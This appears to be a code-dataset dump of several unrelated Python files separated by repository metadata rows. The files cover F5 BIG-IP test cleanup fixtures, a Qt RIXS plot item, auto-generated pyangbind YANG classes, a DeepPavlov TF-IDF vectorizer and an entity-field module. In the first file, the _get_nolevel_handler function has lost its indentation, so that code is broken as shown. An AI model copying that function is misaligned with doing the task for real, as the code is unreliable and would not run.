from f5.utils.testutils.registrytools import order_by_weights
from icontrol.exceptions import iControlUnexpectedHTTPError
from f5_openstack_agent.lbaasv2.drivers.bigip.icontrol_driver import\
iControlDriver
@pytest.fixture(scope='module')
def makelogdir(request):
    """Create and return a per-module, per-run log directory.

    Layout: <module dir>/logs/<module name>/<unix timestamp>.
    """
    logtime = '%0.0f' % time.time()  # whole-second timestamp as the leaf dir
    dirname = os.path.dirname(request.module.__file__)
    modfname = request.module.__name__
    logdirname = os.path.join(dirname, 'logs', modfname, logtime)
    os.makedirs(logdirname)
    return logdirname
def _get_nolevel_handler(logname):
rootlogger = logging.getLogger()
for h in rootlogger.handlers:
rootlogger.removeHandler(h)
rootlogger.setLevel(logging.INFO)
fh = logging.FileHandler(logname)
fh.setLevel(logging.INFO)
rootlogger.addHandler(fh)
return fh
def remove_elements(bigip, uris, vlan=False):
    """Delete the BIG-IP objects named by *uris* in dependency order.

    FDB tunnel records are cleared first so tunnels can be removed;
    deletions already-gone (404) are ignored, and two 400 cases tied
    to fdb/vxlan tunnel ordering are handled specially.
    """
    # Clear forwarding-database records on every non-built-in tunnel.
    for t in bigip.tm.net.fdb.tunnels.get_collection():
        if t.name != 'http-tunnel' and t.name != 'socks-tunnel':
            t.update(records=[])
    registry = register_device(bigip)
    # Order deletions so dependents are removed before their dependencies.
    ordered = order_by_weights(uris, AGENT_LB_DEL_ORDER)
    for selfLink in ordered:
        try:
            if selfLink in registry:
                registry[selfLink].delete()
        except iControlUnexpectedHTTPError as exc:
            sc = exc.response.status_code
            if sc == 404:
                # Already gone; nothing to do.
                logging.debug(sc)
            elif sc == 400 and 'fdb/tunnel' in selfLink and vlan:
                # If testing VLAN (with vCMP) the fdb tunnel cannot be deleted
                # directly. It goes away when the net tunnel is deleted
                continue
            elif sc == 400\
                    and 'mgmt/tm/net/tunnels/tunnel/' in selfLink\
                    and 'tunnel-vxlan' in selfLink:
                # A vxlan tunnel refuses deletion while fdb records remain:
                # clear them again, then retry the delete once.
                for t in bigip.tm.net.fdb.tunnels.get_collection():
                    if t.name != 'http-tunnel' and t.name != 'socks-tunnel':
                        t.update(records=[])
                registry[selfLink].delete()
            else:
                raise
def setup_neutronless_test(request, bigip, makelogdir, vlan=False):
    """Snapshot the device, route logging to a per-test file, and
    register a finalizer that deletes everything the test created.

    Returns the file log handler so the test can inspect/close it.
    """
    # Device state before the test; the finalizer diffs against this.
    pretest_snapshot = frozenset(register_device(bigip))
    logname = os.path.join(makelogdir, request.function.__name__)
    loghandler = _get_nolevel_handler(logname)
    def remove_test_created_elements():
        # Everything present now but absent before was created by the test.
        posttest_registry = register_device(bigip)
        created = frozenset(posttest_registry) - pretest_snapshot
        remove_elements(bigip, created, vlan)
        # Detach the per-test log handler from the root logger.
        rootlogger = logging.getLogger()
        rootlogger.removeHandler(loghandler)
    request.addfinalizer(remove_test_created_elements)
    return loghandler
@pytest.fixture
def configure_icd():
    """Factory fixture producing a configured iControlDriver with a mocked
    Neutron RPC plugin.

    NOTE(review): Python 2 only -- ``unicode`` is referenced below.
    """
    class ConfFake(object):
        '''minimal fake config object to replace oslo with controlled params'''
        def __init__(self, params):
            self.__dict__ = params
            for k, v in self.__dict__.items():
                # Py2: normalize unicode params to utf-8 byte strings,
                # matching what the driver expects from oslo.config.
                if isinstance(v, unicode):
                    self.__dict__[k] = v.encode('utf-8')

        def __repr__(self):
            return repr(self.__dict__)

    def _icd(icd_config):
        # get_port_by_name returns a canned fixed-ip record so no live
        # Neutron service is required by the tests.
        mock_rpc_plugin = mock.MagicMock()
        mock_rpc_plugin.get_port_by_name.return_value =\
            [{'fixed_ips': [{'ip_address': '10.2.2.134'}]}]
        icontroldriver = iControlDriver(ConfFake(icd_config),
                                        registerOpts=False)
        icontroldriver.plugin_rpc = mock_rpc_plugin
        return icontroldriver
    return _icd
| 35.46281
| 79
| 0.669541
|
4a0a4615f68358364512aeee527a676301442650
| 2,829
|
py
|
Python
|
sloth/gui/rixs/items.py
|
maurov/xraysloth
|
6f18ddcb02050431574693d46bcf4b89c719c40b
|
[
"BSD-3-Clause"
] | 4
|
2015-07-03T09:38:58.000Z
|
2022-03-16T11:09:49.000Z
|
sloth/gui/rixs/items.py
|
maurov/xraysloth
|
6f18ddcb02050431574693d46bcf4b89c719c40b
|
[
"BSD-3-Clause"
] | null | null | null |
sloth/gui/rixs/items.py
|
maurov/xraysloth
|
6f18ddcb02050431574693d46bcf4b89c719c40b
|
[
"BSD-3-Clause"
] | 2
|
2017-05-22T17:14:11.000Z
|
2017-07-04T04:52:08.000Z
|
#!/usr/bin/env python
# coding: utf-8
"""
RIXS items
"""
from silx.gui import qt
from sloth.gui.daxs.items import TreeItem
class RixsItem(TreeItem):
    """Checkable tree item wrapping a RIXS dataset.

    Adds a user-checkable column 0 and tracks which plot window the
    item's data should be rendered in.
    """

    def __init__(self, name=None, parentItem=None, isChecked=False, data=None):
        super(RixsItem, self).__init__(name, parentItem, isChecked)
        self._plotWindows = None        # available plot windows (list or None)
        self._currentPlotWindow = None  # window used by plot()
        self._rixsdata = data           # underlying RIXS data object

    def data(self, column, name, role):
        """Expose the checked state of column 0; defer everything else."""
        if role == qt.Qt.CheckStateRole:
            if column == 0:
                if self.isChecked:
                    return qt.Qt.Checked
                else:
                    return qt.Qt.Unchecked
        return super(RixsItem, self).data(column, name, role)

    def setData(self, column, name, value, role):
        """Store the checked state for column 0; defer everything else."""
        if role == qt.Qt.CheckStateRole:
            if value == qt.Qt.Checked:
                self.isChecked = True
            else:
                self.isChecked = False
            return True
        return super(RixsItem, self).setData(column, name, value, role)

    def flags(self, column):
        """Make column 0 user-checkable."""
        flags = super(RixsItem, self).flags(column)
        if column == 0:
            return flags | qt.Qt.ItemIsUserCheckable
        else:
            return flags

    @property
    def currentPlotWindowIndex(self):
        """Index of the current plot window as a string, or None."""
        if self.currentPlotWindow is not None:
            return str(self.currentPlotWindow.index())
        else:
            return None

    @currentPlotWindowIndex.setter
    def currentPlotWindowIndex(self, value):
        try:
            self._currentPlotWindowIndex = int(value)
        except ValueError:
            self.currentPlotWindow = None
        else:
            # NOTE(review): assumes plotWindows is set and the index is in
            # range whenever a numeric value is assigned -- confirm callers.
            self.currentPlotWindow = self.plotWindows[self._currentPlotWindowIndex]  # noqa

    @property
    def currentPlotWindow(self):
        """Current plot window, falling back to the first available one.

        Self-heals: if the cached window is no longer among plotWindows
        (or plotWindows is unset), it is replaced or cleared.
        """
        if self._currentPlotWindow is None:
            if self.plotWindows:
                self._currentPlotWindow = self.plotWindows[0]
        # Bug fix: guard against plotWindows being None before the
        # membership test (the original raised TypeError on `in None`).
        elif not self.plotWindows or \
                self._currentPlotWindow not in self.plotWindows:
            if self.plotWindows:
                self._currentPlotWindow = self.plotWindows[0]
            else:
                self._currentPlotWindow = None
        return self._currentPlotWindow

    @currentPlotWindow.setter
    def currentPlotWindow(self, value):
        self._currentPlotWindow = value

    @property
    def plotWindowsIndexes(self):
        """List of available window indexes as strings."""
        indexes = list()
        if self.plotWindows is not None:
            for index, _ in enumerate(self.plotWindows):
                indexes.append(str(index))
        return indexes

    @property
    def plotWindows(self):
        return self._plotWindows

    @plotWindows.setter
    def plotWindows(self, value):
        self._plotWindows = value

    def plot(self):
        """Render the wrapped RIXS data into the current plot window."""
        self._rixsdata.plot(plotter=self.currentPlotWindow)
| 29.778947
| 90
| 0.60304
|
4a0a461cfeac76258ace4dbcdf5478ee042869af
| 15,342
|
py
|
Python
|
napalm_yang/models/openconfig/network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/ipv6_reachability/prefixes/prefixes_/undefined_subtlvs/__init__.py
|
ckishimo/napalm-yang
|
8f2bd907bd3afcde3c2f8e985192de74748baf6c
|
[
"Apache-2.0"
] | 64
|
2016-10-20T15:47:18.000Z
|
2021-11-11T11:57:32.000Z
|
napalm_yang/models/openconfig/network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/ipv6_reachability/prefixes/prefixes_/undefined_subtlvs/__init__.py
|
ckishimo/napalm-yang
|
8f2bd907bd3afcde3c2f8e985192de74748baf6c
|
[
"Apache-2.0"
] | 126
|
2016-10-05T10:36:14.000Z
|
2019-05-15T08:43:23.000Z
|
napalm_yang/models/openconfig/network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/ipv6_reachability/prefixes/prefixes_/undefined_subtlvs/__init__.py
|
ckishimo/napalm-yang
|
8f2bd907bd3afcde3c2f8e985192de74748baf6c
|
[
"Apache-2.0"
] | 63
|
2016-11-07T15:23:08.000Z
|
2021-09-22T14:41:16.000Z
|
# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
from . import undefined_subtlv
class undefined_subtlvs(PybindBase):
    """
    This class was auto-generated by the PythonClass plugin for PYANG
    from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/isis/levels/level/link-state-database/lsp/tlvs/tlv/ipv6-reachability/prefixes/prefixes/undefined-subtlvs. Each member element of
    the container is represented as a class variable - with a specific
    YANG type.

    YANG Description: This container describes undefined ISIS TLVs.
    """

    # Auto-generated pyangbind container: do not edit by hand; regenerate
    # from the YANG model instead.
    __slots__ = ("_path_helper", "_extmethods", "__undefined_subtlv")

    _yang_name = "undefined-subtlvs"
    _pybind_generated_by = "container"

    def __init__(self, *args, **kwargs):
        self._path_helper = False
        self._extmethods = False
        # Keyed YANG list of unrecognised sub-TLVs, keyed by "type".
        self.__undefined_subtlv = YANGDynClass(
            base=YANGListType(
                "type",
                undefined_subtlv.undefined_subtlv,
                yang_name="undefined-subtlv",
                parent=self,
                is_container="list",
                user_ordered=False,
                path_helper=self._path_helper,
                yang_keys="type",
                extensions=None,
            ),
            is_container="list",
            yang_name="undefined-subtlv",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            extensions=None,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="list",
            is_config=False,
        )

        load = kwargs.pop("load", None)
        # Optional copy-construction from a compatible pyangbind object.
        if args:
            if len(args) > 1:
                raise TypeError("cannot create a YANG container with >1 argument")
            all_attr = True
            for e in self._pyangbind_elements:
                if not hasattr(args[0], e):
                    all_attr = False
                    break
            if not all_attr:
                raise ValueError("Supplied object did not have the correct attributes")
            for e in self._pyangbind_elements:
                nobj = getattr(args[0], e)
                if nobj._changed() is False:
                    continue
                setmethod = getattr(self, "_set_%s" % e)
                if load is None:
                    setmethod(getattr(args[0], e))
                else:
                    setmethod(getattr(args[0], e), load=load)

    def _path(self):
        # Absolute path of this container within the openconfig tree when
        # no parent is registered; otherwise derived from the parent.
        if hasattr(self, "_parent"):
            return self._parent._path() + [self._yang_name]
        else:
            return [
                "network-instances",
                "network-instance",
                "protocols",
                "protocol",
                "isis",
                "levels",
                "level",
                "link-state-database",
                "lsp",
                "tlvs",
                "tlv",
                "ipv6-reachability",
                "prefixes",
                "prefixes",
                "undefined-subtlvs",
            ]

    def _get_undefined_subtlv(self):
        """
        Getter method for undefined_subtlv, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/ipv6_reachability/prefixes/prefixes/undefined_subtlvs/undefined_subtlv (list)

        YANG Description: Sub-TLVs that are not defined in the model or not recognised by
        system.
        """
        return self.__undefined_subtlv

    def _set_undefined_subtlv(self, v, load=False):
        """
        Setter method for undefined_subtlv, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/ipv6_reachability/prefixes/prefixes/undefined_subtlvs/undefined_subtlv (list)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_undefined_subtlv is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_undefined_subtlv() directly.

        YANG Description: Sub-TLVs that are not defined in the model or not recognised by
        system.
        """
        if hasattr(v, "_utype"):
            v = v._utype(v)
        try:
            t = YANGDynClass(
                v,
                base=YANGListType(
                    "type",
                    undefined_subtlv.undefined_subtlv,
                    yang_name="undefined-subtlv",
                    parent=self,
                    is_container="list",
                    user_ordered=False,
                    path_helper=self._path_helper,
                    yang_keys="type",
                    extensions=None,
                ),
                is_container="list",
                yang_name="undefined-subtlv",
                parent=self,
                path_helper=self._path_helper,
                extmethods=self._extmethods,
                register_paths=True,
                extensions=None,
                namespace="http://openconfig.net/yang/network-instance",
                defining_module="openconfig-network-instance",
                yang_type="list",
                is_config=False,
            )
        except (TypeError, ValueError):
            raise ValueError(
                {
                    "error-string": """undefined_subtlv must be of a type compatible with list""",
                    "defined-type": "list",
                    "generated-type": """YANGDynClass(base=YANGListType("type",undefined_subtlv.undefined_subtlv, yang_name="undefined-subtlv", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='type', extensions=None), is_container='list', yang_name="undefined-subtlv", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='list', is_config=False)""",
                }
            )

        self.__undefined_subtlv = t
        if hasattr(self, "_set"):
            self._set()

    def _unset_undefined_subtlv(self):
        # Reset the list back to its default (empty) generated state.
        self.__undefined_subtlv = YANGDynClass(
            base=YANGListType(
                "type",
                undefined_subtlv.undefined_subtlv,
                yang_name="undefined-subtlv",
                parent=self,
                is_container="list",
                user_ordered=False,
                path_helper=self._path_helper,
                yang_keys="type",
                extensions=None,
            ),
            is_container="list",
            yang_name="undefined-subtlv",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            extensions=None,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="list",
            is_config=False,
        )

    # Read-only public property (config: false in the YANG model).
    undefined_subtlv = __builtin__.property(_get_undefined_subtlv)

    _pyangbind_elements = OrderedDict([("undefined_subtlv", undefined_subtlv)])
from . import undefined_subtlv
class undefined_subtlvs(PybindBase):
    """
    This class was auto-generated by the PythonClass plugin for PYANG
    from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/isis/levels/level/link-state-database/lsp/tlvs/tlv/ipv6-reachability/prefixes/prefixes/undefined-subtlvs. Each member element of
    the container is represented as a class variable - with a specific
    YANG type.

    YANG Description: This container describes undefined ISIS TLVs.
    """

    # NOTE(review): this second auto-generated class (for module
    # openconfig-network-instance-l2) re-binds the module-level name and
    # shadows the identical definition above -- standard pyangbind output.
    __slots__ = ("_path_helper", "_extmethods", "__undefined_subtlv")

    _yang_name = "undefined-subtlvs"
    _pybind_generated_by = "container"

    def __init__(self, *args, **kwargs):
        self._path_helper = False
        self._extmethods = False
        # Keyed YANG list of unrecognised sub-TLVs, keyed by "type".
        self.__undefined_subtlv = YANGDynClass(
            base=YANGListType(
                "type",
                undefined_subtlv.undefined_subtlv,
                yang_name="undefined-subtlv",
                parent=self,
                is_container="list",
                user_ordered=False,
                path_helper=self._path_helper,
                yang_keys="type",
                extensions=None,
            ),
            is_container="list",
            yang_name="undefined-subtlv",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            extensions=None,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="list",
            is_config=False,
        )

        load = kwargs.pop("load", None)
        # Optional copy-construction from a compatible pyangbind object.
        if args:
            if len(args) > 1:
                raise TypeError("cannot create a YANG container with >1 argument")
            all_attr = True
            for e in self._pyangbind_elements:
                if not hasattr(args[0], e):
                    all_attr = False
                    break
            if not all_attr:
                raise ValueError("Supplied object did not have the correct attributes")
            for e in self._pyangbind_elements:
                nobj = getattr(args[0], e)
                if nobj._changed() is False:
                    continue
                setmethod = getattr(self, "_set_%s" % e)
                if load is None:
                    setmethod(getattr(args[0], e))
                else:
                    setmethod(getattr(args[0], e), load=load)

    def _path(self):
        # Absolute path of this container within the openconfig tree when
        # no parent is registered; otherwise derived from the parent.
        if hasattr(self, "_parent"):
            return self._parent._path() + [self._yang_name]
        else:
            return [
                "network-instances",
                "network-instance",
                "protocols",
                "protocol",
                "isis",
                "levels",
                "level",
                "link-state-database",
                "lsp",
                "tlvs",
                "tlv",
                "ipv6-reachability",
                "prefixes",
                "prefixes",
                "undefined-subtlvs",
            ]

    def _get_undefined_subtlv(self):
        """
        Getter method for undefined_subtlv, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/ipv6_reachability/prefixes/prefixes/undefined_subtlvs/undefined_subtlv (list)

        YANG Description: Sub-TLVs that are not defined in the model or not recognised by
        system.
        """
        return self.__undefined_subtlv

    def _set_undefined_subtlv(self, v, load=False):
        """
        Setter method for undefined_subtlv, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/ipv6_reachability/prefixes/prefixes/undefined_subtlvs/undefined_subtlv (list)
        If this variable is read-only (config: false) in the
        source YANG file, then _set_undefined_subtlv is considered as a private
        method. Backends looking to populate this variable should
        do so via calling thisObj._set_undefined_subtlv() directly.

        YANG Description: Sub-TLVs that are not defined in the model or not recognised by
        system.
        """
        if hasattr(v, "_utype"):
            v = v._utype(v)
        try:
            t = YANGDynClass(
                v,
                base=YANGListType(
                    "type",
                    undefined_subtlv.undefined_subtlv,
                    yang_name="undefined-subtlv",
                    parent=self,
                    is_container="list",
                    user_ordered=False,
                    path_helper=self._path_helper,
                    yang_keys="type",
                    extensions=None,
                ),
                is_container="list",
                yang_name="undefined-subtlv",
                parent=self,
                path_helper=self._path_helper,
                extmethods=self._extmethods,
                register_paths=True,
                extensions=None,
                namespace="http://openconfig.net/yang/network-instance",
                defining_module="openconfig-network-instance",
                yang_type="list",
                is_config=False,
            )
        except (TypeError, ValueError):
            raise ValueError(
                {
                    "error-string": """undefined_subtlv must be of a type compatible with list""",
                    "defined-type": "list",
                    "generated-type": """YANGDynClass(base=YANGListType("type",undefined_subtlv.undefined_subtlv, yang_name="undefined-subtlv", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='type', extensions=None), is_container='list', yang_name="undefined-subtlv", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='list', is_config=False)""",
                }
            )

        self.__undefined_subtlv = t
        if hasattr(self, "_set"):
            self._set()

    def _unset_undefined_subtlv(self):
        # Reset the list back to its default (empty) generated state.
        self.__undefined_subtlv = YANGDynClass(
            base=YANGListType(
                "type",
                undefined_subtlv.undefined_subtlv,
                yang_name="undefined-subtlv",
                parent=self,
                is_container="list",
                user_ordered=False,
                path_helper=self._path_helper,
                yang_keys="type",
                extensions=None,
            ),
            is_container="list",
            yang_name="undefined-subtlv",
            parent=self,
            path_helper=self._path_helper,
            extmethods=self._extmethods,
            register_paths=True,
            extensions=None,
            namespace="http://openconfig.net/yang/network-instance",
            defining_module="openconfig-network-instance",
            yang_type="list",
            is_config=False,
        )

    # Read-only public property (config: false in the YANG model).
    undefined_subtlv = __builtin__.property(_get_undefined_subtlv)

    _pyangbind_elements = OrderedDict([("undefined_subtlv", undefined_subtlv)])
| 39.541237
| 569
| 0.590145
|
4a0a464792f101a24cc97b3e67a2f554cb691010
| 6,203
|
py
|
Python
|
deeppavlov/models/vectorizers/hashing_tfidf_vectorizer.py
|
havesupper/DeepPavlov
|
142f9ff05d53e78bae77f6392613eccea0aa57f7
|
[
"Apache-2.0"
] | 1
|
2018-07-18T11:50:45.000Z
|
2018-07-18T11:50:45.000Z
|
deeppavlov/models/vectorizers/hashing_tfidf_vectorizer.py
|
havesupper/DeepPavlov
|
142f9ff05d53e78bae77f6392613eccea0aa57f7
|
[
"Apache-2.0"
] | null | null | null |
deeppavlov/models/vectorizers/hashing_tfidf_vectorizer.py
|
havesupper/DeepPavlov
|
142f9ff05d53e78bae77f6392613eccea0aa57f7
|
[
"Apache-2.0"
] | null | null | null |
"""
Copyright 2017 Neural Networks and Deep Learning lab, MIPT
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from collections import Counter
from typing import List, Any, Generator, Tuple, KeysView, ValuesView, Type, Dict
import scipy as sp
from scipy import sparse
import numpy as np
from sklearn.utils import murmurhash3_32
from deeppavlov.core.models.component import Component
from deeppavlov.core.models.serializable import Serializable
from deeppavlov.core.common.log import get_logger
from deeppavlov.core.common.registry import register
TOKENIZER = None
logger = get_logger(__name__)
def hash_(token, hash_size):
    """Map *token* to a bucket in ``[0, hash_size)`` via murmur3."""
    digest = murmurhash3_32(token, positive=True)
    return digest % hash_size
@register('hashing_tfidf_vectorizer')
class HashingTfIdfVectorizer(Component, Serializable):
    """
    Create a tfidf matrix from collection of documents.

    Documents are hashed into a fixed number of buckets (``hash_size``),
    so no vocabulary needs to be stored.
    """

    def __init__(self, tokenizer, hash_size=2 ** 24, doc_index: dict =None,
                 save_path: str = None, load_path: str = None, **kwargs):
        """
        :param hash_size: a size of hash, power of 2
        :param tokenizer: a tokenizer class
        :param doc_index: mapping from document id to column index
        :param save_path: where save() writes the npz matrix
        :param load_path: where load() reads the npz matrix from
        """
        super().__init__(save_path=save_path, load_path=load_path, mode=kwargs.get('mode', 'infer'))
        self.hash_size = hash_size
        self.tokenizer = tokenizer
        self.term_freqs = None  # per-bucket document frequencies (set by save/load)
        self.doc_index = doc_index
        global TOKENIZER
        # NOTE(review): module-level alias of the last-constructed tokenizer;
        # not used elsewhere in this file -- confirm external users exist.
        TOKENIZER = self.tokenizer
        # COO-style accumulators filled by fit_batch() and consumed by save().
        self.rows = []
        self.cols = []
        self.data = []

    def __call__(self, questions: List[str]) -> sp.sparse.csr_matrix:
        """Transform a batch of questions into a sparse tfidf matrix of
        shape ``(len(questions), hash_size)``."""
        sp_tfidfs = []
        for question in questions:
            ngrams = list(self.tokenizer([question]))
            hashes = [hash_(ngram, self.hash_size) for ngram in ngrams[0]]
            hashes_unique, q_hashes = np.unique(hashes, return_counts=True)
            tfs = np.log1p(q_hashes)
            # TODO revise policy if len(q_hashes) == 0
            # NOTE(review): this early return abandons the rest of the batch
            # and yields a single all-zero row -- confirm this is intended
            # for multi-question input.
            if len(q_hashes) == 0:
                return sp.sparse.csr_matrix((1, self.hash_size))
            size = len(self.doc_index)
            # BM25-style idf with 0.5 smoothing; negative idfs clamped to 0.
            Ns = self.term_freqs[hashes_unique]
            idfs = np.log((size - Ns + 0.5) / (Ns + 0.5))
            idfs[idfs < 0] = 0
            tfidf = np.multiply(tfs, idfs)
            indptr = np.array([0, len(hashes_unique)])
            sp_tfidf = sp.sparse.csr_matrix(
                (tfidf, hashes_unique, indptr), shape=(1, self.hash_size)
            )
            sp_tfidfs.append(sp_tfidf)
        transformed = sp.sparse.vstack(sp_tfidfs)
        return transformed

    def get_counts(self, docs: List[str], doc_ids: List[Any]) \
            -> Generator[Tuple[KeysView, ValuesView, List[int]], Any, None]:
        """Yield (hash keys, counts, column ids) triples, one per document."""
        logger.info("Tokenizing batch...")
        batch_ngrams = list(self.tokenizer(docs))
        logger.info("Counting hash...")
        doc_id = iter(doc_ids)
        for ngrams in batch_ngrams:
            counts = Counter([hash_(gram, self.hash_size) for gram in ngrams])
            hashes = counts.keys()
            values = counts.values()
            _id = self.doc_index[next(doc_id)]
            if values:
                col_id = [_id] * len(values)
            else:
                col_id = []
            yield hashes, values, col_id

    def get_count_matrix(self, row: List[int], col: List[int], data: List[int], size) \
            -> sp.sparse.csr_matrix:
        """Build a (hash_size, num_docs) count matrix from COO triples."""
        count_matrix = sparse.csr_matrix((data, (row, col)), shape=(self.hash_size, size))
        count_matrix.sum_duplicates()
        return count_matrix

    @staticmethod
    def get_tfidf_matrix(count_matrix: sp.sparse.csr_matrix) -> Tuple[
            sp.sparse.csr_matrix, np.array]:
        """Convert a word count matrix into a tfidf matrix."""
        # Document frequency per hash bucket = count of docs with count > 0.
        binary = (count_matrix > 0).astype(int)
        term_freqs = np.array(binary.sum(1)).squeeze()
        idfs = np.log((count_matrix.shape[1] - term_freqs + 0.5) / (term_freqs + 0.5))
        idfs[idfs < 0] = 0
        idfs = sp.sparse.diags(idfs, 0)
        tfs = count_matrix.log1p()
        tfidfs = idfs.dot(tfs)
        return tfidfs, term_freqs

    def fit_batch(self, docs, doc_ids) -> None:
        """Accumulate COO triples for a batch of documents."""
        for batch_rows, batch_data, batch_cols in self.get_counts(docs, doc_ids):
            self.rows.extend(batch_rows)
            self.cols.extend(batch_cols)
            self.data.extend(batch_data)

    def save(self) -> None:
        """Build the tfidf matrix from accumulated counts and save as npz."""
        logger.info("Saving tfidf matrix to {}".format(self.save_path))
        count_matrix = self.get_count_matrix(self.rows, self.cols, self.data,
                                             size=len(self.doc_index))
        tfidf_matrix, term_freqs = self.get_tfidf_matrix(count_matrix)
        self.term_freqs = term_freqs
        opts = {'hash_size': self.hash_size,
                'ngram_range': self.tokenizer.ngram_range,
                'doc_index': self.doc_index,
                'term_freqs': self.term_freqs}
        data = {
            'data': tfidf_matrix.data,
            'indices': tfidf_matrix.indices,
            'indptr': tfidf_matrix.indptr,
            'shape': tfidf_matrix.shape,
            'opts': opts
        }
        np.savez(self.save_path, **data)
        # release memory
        self.reset()

    def reset(self):
        """Clear the COO accumulators."""
        self.rows.clear()
        self.cols.clear()
        self.data.clear()

    def load(self) -> Tuple[sp.sparse.csr_matrix, Dict]:
        """Load the saved tfidf matrix and its options from ``load_path``."""
        # TODO implement loading from URL
        logger.info("Loading tfidf matrix from {}".format(self.load_path))
        loader = np.load(self.load_path)
        matrix = sp.sparse.csr_matrix((loader['data'], loader['indices'],
                                       loader['indptr']), shape=loader['shape'])
        return matrix, loader['opts'].item(0)
| 35.045198
| 100
| 0.61841
|
4a0a4714139035a823bde16934e683809b56f444
| 22,066
|
py
|
Python
|
tools/efro/entity/_field.py
|
Awesome-Logic/ballistica
|
233a4a4f7840c9c666a1809626b6993a4b145349
|
[
"MIT"
] | 1
|
2020-04-04T01:32:29.000Z
|
2020-04-04T01:32:29.000Z
|
tools/efro/entity/_field.py
|
Awesome-Logic/ballistica
|
233a4a4f7840c9c666a1809626b6993a4b145349
|
[
"MIT"
] | null | null | null |
tools/efro/entity/_field.py
|
Awesome-Logic/ballistica
|
233a4a4f7840c9c666a1809626b6993a4b145349
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2011-2020 Eric Froemling
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# -----------------------------------------------------------------------------
"""Field types for the entity system."""
from __future__ import annotations
import copy
import logging
from typing import TYPE_CHECKING, Generic, TypeVar, overload
from efro.entity._support import (BaseField, BoundCompoundValue,
BoundListField, BoundDictField,
BoundCompoundListField,
BoundCompoundDictField)
from efro.entity.util import have_matching_fields
if TYPE_CHECKING:
from typing import Dict, Type, List, Any
from efro.entity._value import TypedValue, CompoundValue
T = TypeVar('T')
TK = TypeVar('TK')
TC = TypeVar('TC', bound='CompoundValue')
class Field(BaseField, Generic[T]):
    """Field consisting of a single value.

    Thin wrapper delegating defaulting/filtering/pruning to the wrapped
    TypedValue.
    """

    def __init__(self,
                 d_key: str,
                 value: TypedValue[T],
                 store_default: bool = True) -> None:
        super().__init__(d_key)
        self.d_value = value
        self._store_default = store_default

    def __repr__(self) -> str:
        return f'<Field "{self.d_key}" with {self.d_value}>'

    def get_default_data(self) -> Any:
        return self.d_value.get_default_data()

    def filter_input(self, data: Any, error: bool) -> Any:
        return self.d_value.filter_input(data, error)

    def filter_output(self, data: Any) -> Any:
        return self.d_value.filter_output(data)

    def prune_data(self, data: Any) -> bool:
        return self.d_value.prune_data(data)

    if TYPE_CHECKING:
        # Use default runtime get/set but let type-checker know our types.
        # Note: we actually return a bound-field when accessed on
        # a type instead of an instance, but we don't reflect that here yet
        # (would need to write a mypy plugin so sub-field access works first)
        @overload
        def __get__(self, obj: None, cls: Any = None) -> Field[T]:
            ...

